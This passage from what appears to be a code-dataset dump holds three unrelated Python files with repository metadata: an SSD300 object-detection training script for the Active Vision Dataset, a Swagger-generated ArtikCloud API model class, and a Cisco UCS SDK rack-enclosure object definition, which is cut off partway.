                boxes_px[k][0] = boxes_px[k][0] / 1920.0
                boxes_px[k][2] = boxes_px[k][2] / 1920.0
                boxes_px[k][1] = boxes_px[k][1] / 1080.0
                boxes_px[k][3] = boxes_px[k][3] / 1080.0
            box_list.append(torch.FloatTensor(boxes_px).to(device))
            label_list.append(torch.LongTensor([l[4] for l in box_id_diff]).to(device))

        images_t = input_batch.to(device)  # (batch_size (N), 3, 300, 300)

        # Forward prop.
        predicted_locs, predicted_scores = model(images_t)  # (N, 8732, 4), (N, 8732, n_classes)

        # Loss
        loss = criterion(predicted_locs, predicted_scores, box_list, label_list)  # scalar

        # Backward prop.
        optimizer.zero_grad()
        loss.backward()

        # Clip gradients, if necessary
        if grad_clip is not None:
            clip_gradient(optimizer, grad_clip)

        # Update model
        optimizer.step()

        losses.update(loss.item(), images_t.size(0))
        batch_time.update(time.time() - start)
        start = time.time()

        # Print status
        if i % print_freq == 0:
            print('Epoch: [{0}][{1}/{2}]\t'
                  'Loss {loss.val:.4f} ({loss.avg:.4f})\t'.format(epoch, i, len(train_loader), loss=losses))

        # free some memory since their histories may be stored
        del predicted_locs, predicted_scores, images_t, box_list, label_list
# Script entry point: run the full training loop when executed directly.
if __name__ == '__main__':
    main()
| 38.049419 | 184 | 0.537627 | import time
import torch.backends.cudnn as cudnn
import torch.optim
import torch.utils.data
from model import SSD300, MultiBoxLoss
from datasets import PascalVOCDataset
from utils import *
data_folder = 'google_drive/MyDrive/ColabNotebooks/Project/GT'
keep_difficult = True
n_classes = len(label_map)
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
checkpoint = "google_drive/MyDrive/checkpointsIeri/checkpoint_ssd300.pth.tar"
batch_size = 9
iterations = 120000
workers = 4
print_freq = 5
lr = 5e-4
decay_lr_at = [80000, 100000]
decay_lr_to = 0.1
momentum = 0.9
weight_decay = 5e-4
grad_clip = None
cudnn.benchmark = True
def main():
global start_epoch, label_map, epoch, checkpoint, decay_lr_at
if checkpoint is None:
start_epoch = 0
model = SSD300(n_classes=n_classes)
biases = list()
not_biases = list()
for param_name, param in model.named_parameters():
if param.requires_grad:
if param_name.endswith('.bias'):
biases.append(param)
else:
not_biases.append(param)
optimizer = torch.optim.SGD(params=[{'params': biases, 'lr': 2 * lr}, {'params': not_biases}],
lr=lr, momentum=momentum, weight_decay=weight_decay)
else:
checkpoint = torch.load(checkpoint)
start_epoch = checkpoint['epoch'] + 1
print('\nLoaded checkpoint from epoch %d.\n' % start_epoch)
model = checkpoint['model']
optimizer = checkpoint['optimizer']
model = model.to(device)
criterion = MultiBoxLoss(priors_cxcy=model.priors_cxcy).to(device)
import transforms, active_vision_dataset
pick_trans = transforms.PickInstances(range(34))
TRAIN_PATH = "./google_drive/MyDrive/ColabNotebooks/Project/trainDataset"
train_dataset = active_vision_dataset.AVD(root=TRAIN_PATH, train=True,
target_transform=pick_trans,
scene_list=['Home_001_1',
'Home_002_1',
'Home_003_1',
'Home_004_1',
'Home_005_1',
'Home_006_1',
'Home_007_1',
'Home_008_1',
'Home_014_1',
'Home_011_1',
'Home_010_1',
'Office_001_1'],
fraction_of_no_box=-1)
train_loader = torch.utils.data.DataLoader(train_dataset,
batch_size=batch_size,
shuffle=True,
collate_fn=active_vision_dataset.collate
)
epochs = iterations // (len(train_dataset) // 32)
decay_lr_at = [it // (len(train_dataset) // 32) for it in decay_lr_at]
for epoch in range(start_epoch, epochs):
if epoch in decay_lr_at:
adjust_learning_rate(optimizer, decay_lr_to)
train(train_loader=train_loader,
model=model,
criterion=criterion,
optimizer=optimizer,
epoch=epoch)
# Save checkpoint
save_checkpoint(epoch, model, optimizer)
def train(train_loader, model, criterion, optimizer, epoch):
model.train() # training mode enables dropout
batch_time = AverageMeter() # forward prop. + back prop. time
data_time = AverageMeter() # data loading time
losses = AverageMeter() # loss
start = time.time()
import numpy as np
# Batches
for i, (images, labels) in enumerate(train_loader):
#CHECK / REMOVE THIS CODE!
data_time.update(time.time() - start)
#print(len(images))
#print(labels)
# Move to default device
data = images
a = np.asarray(data)
#print(a.shape)
#a = np.squeeze(a, axis=1) # shape should now be (L, 224, 224, 3)
#image = torch.from_numpy(a)
#image = image.permute(0,3,1,2)
#print(image.shape)
#Pre-processing:
from torchvision import transforms as transf
preprocess = transf.Compose([
transf.ToPILImage(),
transf.Resize(300),
transf.CenterCrop(300),
transf.ToTensor(),
transf.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
])
for j in range(batch_size):
if j == 0:
input_tensor = preprocess(images[j])
input_tensor = input_tensor.unsqueeze(0)
input_batch = input_tensor
else:
input_tensor = preprocess(images[j])
#print(input_tensor)
input_tensor = input_tensor.unsqueeze(0) # create a mini-batch as expected by the model
#print(input_tensor.shape)
input_batch = torch.cat((input_batch, input_tensor), 0)
#print("shape images: ",input_batch.shape)
# In the Active Vision Dataset we have this formatting:
# [xmin ymin xmax ymax instance_id difficulty]
#Prints to test
#print(j)
box_id_diff = [b for b in labels[j][0]]
box = [l[0:4] for l in box_id_diff]
#print('before:',box) #To check
#Boundary coordinates as requested
for k in range(len(box)):
box[k][0] = box[k][0]/1920.0
box[k][2] = box[k][2]/1920.0
box[k][1] = box[k][1]/1080.0
box[k][3] = box[k][3]/1080.0
#print('after:',box) #To check
box_tensor = torch.FloatTensor(box).to(device)
#Done with the parameter in AVD method
#print(box_tensor) #To check
if j == 0:
box_list = [box_tensor]
else:
box_list.append(box_tensor)
label = [l[4] for l in box_id_diff]
label_tensor = torch.LongTensor(label).to(device)
if j == 0:
label_list = [label_tensor]
else:
label_list.append(label_tensor)
#print(box_id_diff[0][0:4])
#box = torch.split(box_id_diff, 2)
#print(box)
#print("list of boxes:",box_list)
#print("list of labels:", label_list)
images = input_batch.to(device) # (batch_size (N), 3, 300, 300)
#print(images.shape)
boxes = box_list
labels = label_list
# Forward prop.
predicted_locs, predicted_scores = model(images) # (N, 8732, 4), (N, 8732, n_classes)
#Prints to check the dimensions
#print(predicted_locs.shape) #correct
#print(predicted_scores.shape) #correct
# Loss
loss = criterion(predicted_locs, predicted_scores, boxes, labels) # scalar
# Backward prop.
optimizer.zero_grad()
loss.backward()
# Clip gradients, if necessary
if grad_clip is not None:
clip_gradient(optimizer, grad_clip)
# Update model
optimizer.step()
losses.update(loss.item(), images.size(0))
batch_time.update(time.time() - start)
start = time.time()
# Print status
if i % print_freq == 0:
print('Epoch: [{0}][{1}/{2}]\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'.format(epoch, i, len(train_loader), loss=losses))
del predicted_locs, predicted_scores, images, boxes, labels # free some memory since their histories may be stored
if __name__ == '__main__':
main()
| true | true |
f7193ee3518594b970384543fd7069dcd703cf96 | 7,181 | py | Python | artikcloud/models/aggregates_histogram_response.py | artikcloud/artikcloud-python-dev | 683cd8304f031913bcd581d1eb78ee0efbc5c113 | [
"Apache-2.0"
] | null | null | null | artikcloud/models/aggregates_histogram_response.py | artikcloud/artikcloud-python-dev | 683cd8304f031913bcd581d1eb78ee0efbc5c113 | [
"Apache-2.0"
] | null | null | null | artikcloud/models/aggregates_histogram_response.py | artikcloud/artikcloud-python-dev | 683cd8304f031913bcd581d1eb78ee0efbc5c113 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
ARTIK Cloud API
No descripton provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 2.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from pprint import pformat
from six import iteritems
import re
class AggregatesHistogramResponse(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, data=None, end_date=None, field=None, interval=None, sdid=None, size=None, start_date=None):
"""
AggregatesHistogramResponse - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'data': 'list[AggregatesHistogramData]',
'end_date': 'int',
'field': 'str',
'interval': 'str',
'sdid': 'str',
'size': 'int',
'start_date': 'int'
}
self.attribute_map = {
'data': 'data',
'end_date': 'endDate',
'field': 'field',
'interval': 'interval',
'sdid': 'sdid',
'size': 'size',
'start_date': 'startDate'
}
self._data = data
self._end_date = end_date
self._field = field
self._interval = interval
self._sdid = sdid
self._size = size
self._start_date = start_date
@property
def data(self):
"""
Gets the data of this AggregatesHistogramResponse.
:return: The data of this AggregatesHistogramResponse.
:rtype: list[AggregatesHistogramData]
"""
return self._data
@data.setter
def data(self, data):
"""
Sets the data of this AggregatesHistogramResponse.
:param data: The data of this AggregatesHistogramResponse.
:type: list[AggregatesHistogramData]
"""
self._data = data
@property
def end_date(self):
"""
Gets the end_date of this AggregatesHistogramResponse.
:return: The end_date of this AggregatesHistogramResponse.
:rtype: int
"""
return self._end_date
@end_date.setter
def end_date(self, end_date):
"""
Sets the end_date of this AggregatesHistogramResponse.
:param end_date: The end_date of this AggregatesHistogramResponse.
:type: int
"""
self._end_date = end_date
@property
def field(self):
"""
Gets the field of this AggregatesHistogramResponse.
:return: The field of this AggregatesHistogramResponse.
:rtype: str
"""
return self._field
@field.setter
def field(self, field):
"""
Sets the field of this AggregatesHistogramResponse.
:param field: The field of this AggregatesHistogramResponse.
:type: str
"""
self._field = field
@property
def interval(self):
"""
Gets the interval of this AggregatesHistogramResponse.
:return: The interval of this AggregatesHistogramResponse.
:rtype: str
"""
return self._interval
@interval.setter
def interval(self, interval):
"""
Sets the interval of this AggregatesHistogramResponse.
:param interval: The interval of this AggregatesHistogramResponse.
:type: str
"""
self._interval = interval
@property
def sdid(self):
"""
Gets the sdid of this AggregatesHistogramResponse.
:return: The sdid of this AggregatesHistogramResponse.
:rtype: str
"""
return self._sdid
@sdid.setter
def sdid(self, sdid):
"""
Sets the sdid of this AggregatesHistogramResponse.
:param sdid: The sdid of this AggregatesHistogramResponse.
:type: str
"""
self._sdid = sdid
@property
def size(self):
"""
Gets the size of this AggregatesHistogramResponse.
:return: The size of this AggregatesHistogramResponse.
:rtype: int
"""
return self._size
@size.setter
def size(self, size):
"""
Sets the size of this AggregatesHistogramResponse.
:param size: The size of this AggregatesHistogramResponse.
:type: int
"""
self._size = size
@property
def start_date(self):
"""
Gets the start_date of this AggregatesHistogramResponse.
:return: The start_date of this AggregatesHistogramResponse.
:rtype: int
"""
return self._start_date
@start_date.setter
def start_date(self, start_date):
"""
Sets the start_date of this AggregatesHistogramResponse.
:param start_date: The start_date of this AggregatesHistogramResponse.
:type: int
"""
self._start_date = start_date
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| 25.464539 | 115 | 0.576521 |
from pprint import pformat
from six import iteritems
import re
class AggregatesHistogramResponse(object):
def __init__(self, data=None, end_date=None, field=None, interval=None, sdid=None, size=None, start_date=None):
self.swagger_types = {
'data': 'list[AggregatesHistogramData]',
'end_date': 'int',
'field': 'str',
'interval': 'str',
'sdid': 'str',
'size': 'int',
'start_date': 'int'
}
self.attribute_map = {
'data': 'data',
'end_date': 'endDate',
'field': 'field',
'interval': 'interval',
'sdid': 'sdid',
'size': 'size',
'start_date': 'startDate'
}
self._data = data
self._end_date = end_date
self._field = field
self._interval = interval
self._sdid = sdid
self._size = size
self._start_date = start_date
@property
def data(self):
return self._data
@data.setter
def data(self, data):
self._data = data
@property
def end_date(self):
return self._end_date
@end_date.setter
def end_date(self, end_date):
self._end_date = end_date
@property
def field(self):
return self._field
@field.setter
def field(self, field):
self._field = field
@property
def interval(self):
return self._interval
@interval.setter
def interval(self, interval):
self._interval = interval
@property
def sdid(self):
return self._sdid
@sdid.setter
def sdid(self, sdid):
self._sdid = sdid
@property
def size(self):
return self._size
@size.setter
def size(self, size):
self._size = size
@property
def start_date(self):
return self._start_date
@start_date.setter
def start_date(self, start_date):
self._start_date = start_date
def to_dict(self):
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
return pformat(self.to_dict())
def __repr__(self):
return self.to_str()
def __eq__(self, other):
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| true | true |
f7193ef954651cd69d7c79d1330decefaa2e8768 | 9,116 | py | Python | ucsmsdk/mometa/equipment/EquipmentRackEnclosure.py | Kego/ucsmsdk | 244f283a5c295cf746110bb96686d079b19927ce | [
"Apache-2.0"
] | 78 | 2015-11-30T14:10:05.000Z | 2022-02-13T00:29:08.000Z | ucsmsdk/mometa/equipment/EquipmentRackEnclosure.py | Kego/ucsmsdk | 244f283a5c295cf746110bb96686d079b19927ce | [
"Apache-2.0"
] | 113 | 2015-11-20T09:42:46.000Z | 2022-03-16T16:53:29.000Z | ucsmsdk/mometa/equipment/EquipmentRackEnclosure.py | Kego/ucsmsdk | 244f283a5c295cf746110bb96686d079b19927ce | [
"Apache-2.0"
] | 86 | 2015-12-12T08:22:18.000Z | 2022-01-23T03:56:34.000Z | """This module contains the general information for EquipmentRackEnclosure ManagedObject."""
from ...ucsmo import ManagedObject
from ...ucscoremeta import MoPropertyMeta, MoMeta
from ...ucsmeta import VersionMeta
class EquipmentRackEnclosureConsts:
MFG_TIME_NOT_APPLICABLE = "not-applicable"
OPERABILITY_ACCESSIBILITY_PROBLEM = "accessibility-problem"
OPERABILITY_AUTO_UPGRADE = "auto-upgrade"
OPERABILITY_BACKPLANE_PORT_PROBLEM = "backplane-port-problem"
OPERABILITY_BIOS_POST_TIMEOUT = "bios-post-timeout"
OPERABILITY_CHASSIS_INTRUSION = "chassis-intrusion"
OPERABILITY_CHASSIS_LIMIT_EXCEEDED = "chassis-limit-exceeded"
OPERABILITY_CONFIG = "config"
OPERABILITY_DECOMISSIONING = "decomissioning"
OPERABILITY_DEGRADED = "degraded"
OPERABILITY_DISABLED = "disabled"
OPERABILITY_DISCOVERY = "discovery"
OPERABILITY_DISCOVERY_FAILED = "discovery-failed"
OPERABILITY_EQUIPMENT_PROBLEM = "equipment-problem"
OPERABILITY_FABRIC_CONN_PROBLEM = "fabric-conn-problem"
OPERABILITY_FABRIC_UNSUPPORTED_CONN = "fabric-unsupported-conn"
OPERABILITY_IDENTIFY = "identify"
OPERABILITY_IDENTITY_UNESTABLISHABLE = "identity-unestablishable"
OPERABILITY_INOPERABLE = "inoperable"
OPERABILITY_LINK_ACTIVATE_BLOCKED = "link-activate-blocked"
OPERABILITY_MALFORMED_FRU = "malformed-fru"
OPERABILITY_NON_OPTIMAL = "non-optimal"
OPERABILITY_NON_OPTIMAL_SEVERE = "non-optimal-severe"
OPERABILITY_NOT_SUPPORTED = "not-supported"
OPERABILITY_OPERABLE = "operable"
OPERABILITY_PEER_COMM_PROBLEM = "peer-comm-problem"
OPERABILITY_PERFORMANCE_PROBLEM = "performance-problem"
OPERABILITY_POST_FAILURE = "post-failure"
OPERABILITY_POWER_PROBLEM = "power-problem"
OPERABILITY_POWERED_OFF = "powered-off"
OPERABILITY_REMOVED = "removed"
OPERABILITY_THERMAL_PROBLEM = "thermal-problem"
OPERABILITY_UNKNOWN = "unknown"
OPERABILITY_UNSUPPORTED_CONFIG = "unsupported-config"
OPERABILITY_UPGRADE_PROBLEM = "upgrade-problem"
OPERABILITY_VOLTAGE_PROBLEM = "voltage-problem"
PRESENCE_EMPTY = "empty"
PRESENCE_EQUIPPED = "equipped"
PRESENCE_EQUIPPED_DEPRECATED = "equipped-deprecated"
PRESENCE_EQUIPPED_DISC_ERROR = "equipped-disc-error"
PRESENCE_EQUIPPED_DISC_IN_PROGRESS = "equipped-disc-in-progress"
PRESENCE_EQUIPPED_DISC_NOT_STARTED = "equipped-disc-not-started"
PRESENCE_EQUIPPED_DISC_UNKNOWN = "equipped-disc-unknown"
PRESENCE_EQUIPPED_IDENTITY_UNESTABLISHABLE = "equipped-identity-unestablishable"
PRESENCE_EQUIPPED_NOT_PRIMARY = "equipped-not-primary"
PRESENCE_EQUIPPED_SLAVE = "equipped-slave"
PRESENCE_EQUIPPED_UNSUPPORTED = "equipped-unsupported"
PRESENCE_EQUIPPED_WITH_MALFORMED_FRU = "equipped-with-malformed-fru"
PRESENCE_INACCESSIBLE = "inaccessible"
PRESENCE_MISMATCH = "mismatch"
PRESENCE_MISMATCH_IDENTITY_UNESTABLISHABLE = "mismatch-identity-unestablishable"
PRESENCE_MISMATCH_SLAVE = "mismatch-slave"
PRESENCE_MISSING = "missing"
PRESENCE_MISSING_SLAVE = "missing-slave"
PRESENCE_NOT_SUPPORTED = "not-supported"
PRESENCE_UNAUTHORIZED = "unauthorized"
PRESENCE_UNKNOWN = "unknown"
class EquipmentRackEnclosure(ManagedObject):
"""This is EquipmentRackEnclosure class."""
consts = EquipmentRackEnclosureConsts()
naming_props = set(['id'])
mo_meta = MoMeta("EquipmentRackEnclosure", "equipmentRackEnclosure", "rack-enclosure-[id]", VersionMeta.Version401a, "InputOutput", 0x3f, [], ["admin", "pn-equipment", "pn-maintenance", "pn-policy"], ['topSystem'], ['equipmentFanModule', 'equipmentPsu', 'equipmentSlotEp'], [None])
prop_meta = {
"asset_tag": MoPropertyMeta("asset_tag", "assetTag", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, None, None, None, r"""[ !#$%&\(\)\*\+,\-\./:;\?@\[\]_\{\|\}~a-zA-Z0-9]{0,32}""", [], []),
"child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version401a, MoPropertyMeta.INTERNAL, 0x2, None, None, r"""((deleteAll|ignore|deleteNonPresent),){0,2}(deleteAll|ignore|deleteNonPresent){0,1}""", [], []),
"dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, 0x4, 0, 256, None, [], []),
"flt_aggr": MoPropertyMeta("flt_aggr", "fltAggr", "ulong", VersionMeta.Version401a, MoPropertyMeta.INTERNAL, None, None, None, None, [], []),
"id": MoPropertyMeta("id", "id", "uint", VersionMeta.Version401a, MoPropertyMeta.NAMING, 0x8, None, None, None, [], []),
"mfg_time": MoPropertyMeta("mfg_time", "mfgTime", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, None, None, None, r"""([0-9]){4}-([0-9]){2}-([0-9]){2}T([0-9]){2}:([0-9]){2}:([0-9]){2}((\.([0-9]){3})){0,1}""", ["not-applicable"], []),
"model": MoPropertyMeta("model", "model", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
"oper_qualifier_reason": MoPropertyMeta("oper_qualifier_reason", "operQualifierReason", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, None, None, None, r"""[ !#$%&\(\)\*\+,\-\./:;\?@\[\]_\{\|\}~a-zA-Z0-9]{0,256}""", [], []),
"operability": MoPropertyMeta("operability", "operability", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["accessibility-problem", "auto-upgrade", "backplane-port-problem", "bios-post-timeout", "chassis-intrusion", "chassis-limit-exceeded", "config", "decomissioning", "degraded", "disabled", "discovery", "discovery-failed", "equipment-problem", "fabric-conn-problem", "fabric-unsupported-conn", "identify", "identity-unestablishable", "inoperable", "link-activate-blocked", "malformed-fru", "non-optimal", "non-optimal-severe", "not-supported", "operable", "peer-comm-problem", "performance-problem", "post-failure", "power-problem", "powered-off", "removed", "thermal-problem", "unknown", "unsupported-config", "upgrade-problem", "voltage-problem"], []),
"part_number": MoPropertyMeta("part_number", "partNumber", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
"presence": MoPropertyMeta("presence", "presence", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["empty", "equipped", "equipped-deprecated", "equipped-disc-error", "equipped-disc-in-progress", "equipped-disc-not-started", "equipped-disc-unknown", "equipped-identity-unestablishable", "equipped-not-primary", "equipped-slave", "equipped-unsupported", "equipped-with-malformed-fru", "inaccessible", "mismatch", "mismatch-identity-unestablishable", "mismatch-slave", "missing", "missing-slave", "not-supported", "unauthorized", "unknown"], []),
"revision": MoPropertyMeta("revision", "revision", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
"rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, 0x10, 0, 256, None, [], []),
"sacl": MoPropertyMeta("sacl", "sacl", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, None, None, None, r"""((none|del|mod|addchild|cascade),){0,4}(none|del|mod|addchild|cascade){0,1}""", [], []),
"serial": MoPropertyMeta("serial", "serial", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
"status": MoPropertyMeta("status", "status", "string", VersionMeta.Version401a, MoPropertyMeta.READ_WRITE, 0x20, None, None, r"""((removed|created|modified|deleted),){0,3}(removed|created|modified|deleted){0,1}""", [], []),
"vendor": MoPropertyMeta("vendor", "vendor", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
"vid": MoPropertyMeta("vid", "vid", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
}
prop_map = {
"assetTag": "asset_tag",
"childAction": "child_action",
"dn": "dn",
"fltAggr": "flt_aggr",
"id": "id",
"mfgTime": "mfg_time",
"model": "model",
"operQualifierReason": "oper_qualifier_reason",
"operability": "operability",
"partNumber": "part_number",
"presence": "presence",
"revision": "revision",
"rn": "rn",
"sacl": "sacl",
"serial": "serial",
"status": "status",
"vendor": "vendor",
"vid": "vid",
}
def __init__(self, parent_mo_or_dn, id, **kwargs):
self._dirty_mask = 0
self.id = id
self.asset_tag = None
self.child_action = None
self.flt_aggr = None
self.mfg_time = None
self.model = None
self.oper_qualifier_reason = None
self.operability = None
self.part_number = None
self.presence = None
self.revision = None
self.sacl = None
self.serial = None
self.status = None
self.vendor = None
self.vid = None
ManagedObject.__init__(self, "EquipmentRackEnclosure", parent_mo_or_dn, **kwargs)
| 66.057971 | 805 | 0.693725 |
from ...ucsmo import ManagedObject
from ...ucscoremeta import MoPropertyMeta, MoMeta
from ...ucsmeta import VersionMeta
class EquipmentRackEnclosureConsts:
MFG_TIME_NOT_APPLICABLE = "not-applicable"
OPERABILITY_ACCESSIBILITY_PROBLEM = "accessibility-problem"
OPERABILITY_AUTO_UPGRADE = "auto-upgrade"
OPERABILITY_BACKPLANE_PORT_PROBLEM = "backplane-port-problem"
OPERABILITY_BIOS_POST_TIMEOUT = "bios-post-timeout"
OPERABILITY_CHASSIS_INTRUSION = "chassis-intrusion"
OPERABILITY_CHASSIS_LIMIT_EXCEEDED = "chassis-limit-exceeded"
OPERABILITY_CONFIG = "config"
OPERABILITY_DECOMISSIONING = "decomissioning"
OPERABILITY_DEGRADED = "degraded"
OPERABILITY_DISABLED = "disabled"
OPERABILITY_DISCOVERY = "discovery"
OPERABILITY_DISCOVERY_FAILED = "discovery-failed"
OPERABILITY_EQUIPMENT_PROBLEM = "equipment-problem"
OPERABILITY_FABRIC_CONN_PROBLEM = "fabric-conn-problem"
OPERABILITY_FABRIC_UNSUPPORTED_CONN = "fabric-unsupported-conn"
OPERABILITY_IDENTIFY = "identify"
OPERABILITY_IDENTITY_UNESTABLISHABLE = "identity-unestablishable"
OPERABILITY_INOPERABLE = "inoperable"
OPERABILITY_LINK_ACTIVATE_BLOCKED = "link-activate-blocked"
OPERABILITY_MALFORMED_FRU = "malformed-fru"
OPERABILITY_NON_OPTIMAL = "non-optimal"
OPERABILITY_NON_OPTIMAL_SEVERE = "non-optimal-severe"
OPERABILITY_NOT_SUPPORTED = "not-supported"
OPERABILITY_OPERABLE = "operable"
OPERABILITY_PEER_COMM_PROBLEM = "peer-comm-problem"
OPERABILITY_PERFORMANCE_PROBLEM = "performance-problem"
OPERABILITY_POST_FAILURE = "post-failure"
OPERABILITY_POWER_PROBLEM = "power-problem"
OPERABILITY_POWERED_OFF = "powered-off"
OPERABILITY_REMOVED = "removed"
OPERABILITY_THERMAL_PROBLEM = "thermal-problem"
OPERABILITY_UNKNOWN = "unknown"
OPERABILITY_UNSUPPORTED_CONFIG = "unsupported-config"
OPERABILITY_UPGRADE_PROBLEM = "upgrade-problem"
OPERABILITY_VOLTAGE_PROBLEM = "voltage-problem"
PRESENCE_EMPTY = "empty"
PRESENCE_EQUIPPED = "equipped"
PRESENCE_EQUIPPED_DEPRECATED = "equipped-deprecated"
PRESENCE_EQUIPPED_DISC_ERROR = "equipped-disc-error"
PRESENCE_EQUIPPED_DISC_IN_PROGRESS = "equipped-disc-in-progress"
PRESENCE_EQUIPPED_DISC_NOT_STARTED = "equipped-disc-not-started"
PRESENCE_EQUIPPED_DISC_UNKNOWN = "equipped-disc-unknown"
PRESENCE_EQUIPPED_IDENTITY_UNESTABLISHABLE = "equipped-identity-unestablishable"
PRESENCE_EQUIPPED_NOT_PRIMARY = "equipped-not-primary"
PRESENCE_EQUIPPED_SLAVE = "equipped-slave"
PRESENCE_EQUIPPED_UNSUPPORTED = "equipped-unsupported"
PRESENCE_EQUIPPED_WITH_MALFORMED_FRU = "equipped-with-malformed-fru"
PRESENCE_INACCESSIBLE = "inaccessible"
PRESENCE_MISMATCH = "mismatch"
PRESENCE_MISMATCH_IDENTITY_UNESTABLISHABLE = "mismatch-identity-unestablishable"
PRESENCE_MISMATCH_SLAVE = "mismatch-slave"
PRESENCE_MISSING = "missing"
PRESENCE_MISSING_SLAVE = "missing-slave"
PRESENCE_NOT_SUPPORTED = "not-supported"
PRESENCE_UNAUTHORIZED = "unauthorized"
PRESENCE_UNKNOWN = "unknown"
class EquipmentRackEnclosure(ManagedObject):
consts = EquipmentRackEnclosureConsts()
naming_props = set(['id'])
mo_meta = MoMeta("EquipmentRackEnclosure", "equipmentRackEnclosure", "rack-enclosure-[id]", VersionMeta.Version401a, "InputOutput", 0x3f, [], ["admin", "pn-equipment", "pn-maintenance", "pn-policy"], ['topSystem'], ['equipmentFanModule', 'equipmentPsu', 'equipmentSlotEp'], [None])
prop_meta = {
"asset_tag": MoPropertyMeta("asset_tag", "assetTag", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, None, None, None, r"""[ !#$%&\(\)\*\+,\-\./:;\?@\[\]_\{\|\}~a-zA-Z0-9]{0,32}""", [], []),
"child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version401a, MoPropertyMeta.INTERNAL, 0x2, None, None, r"""((deleteAll|ignore|deleteNonPresent),){0,2}(deleteAll|ignore|deleteNonPresent){0,1}""", [], []),
"dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, 0x4, 0, 256, None, [], []),
"flt_aggr": MoPropertyMeta("flt_aggr", "fltAggr", "ulong", VersionMeta.Version401a, MoPropertyMeta.INTERNAL, None, None, None, None, [], []),
"id": MoPropertyMeta("id", "id", "uint", VersionMeta.Version401a, MoPropertyMeta.NAMING, 0x8, None, None, None, [], []),
"mfg_time": MoPropertyMeta("mfg_time", "mfgTime", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, None, None, None, r"""([0-9]){4}-([0-9]){2}-([0-9]){2}T([0-9]){2}:([0-9]){2}:([0-9]){2}((\.([0-9]){3})){0,1}""", ["not-applicable"], []),
"model": MoPropertyMeta("model", "model", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
"oper_qualifier_reason": MoPropertyMeta("oper_qualifier_reason", "operQualifierReason", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, None, None, None, r"""[ !#$%&\(\)\*\+,\-\./:;\?@\[\]_\{\|\}~a-zA-Z0-9]{0,256}""", [], []),
"operability": MoPropertyMeta("operability", "operability", "string", VersionMeta.Version401a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["accessibility-problem", "auto-upgrade", "backplane-port-problem", "bios-post-timeout", "chassis-intrusion", "chassis-limit-exceeded", "config", "decomissioning", "degraded", "disabled", "discovery", "discovery-failed", "equipment-problem", "fabric-conn-problem", "fabric-unsupported-conn", "identify", "identity-unestablishable", "inoperable", "link-activate-blocked", "malformed-fru", "non-optimal", "non-optimal-severe", "not-supported", "operable", "peer-comm-problem", "performance-problem", "post-failure", "power-problem", "powered-off", "removed", "thermal-problem", "unknown", "unsupported-config", "upgrade-problem", "voltage-problem"], []),
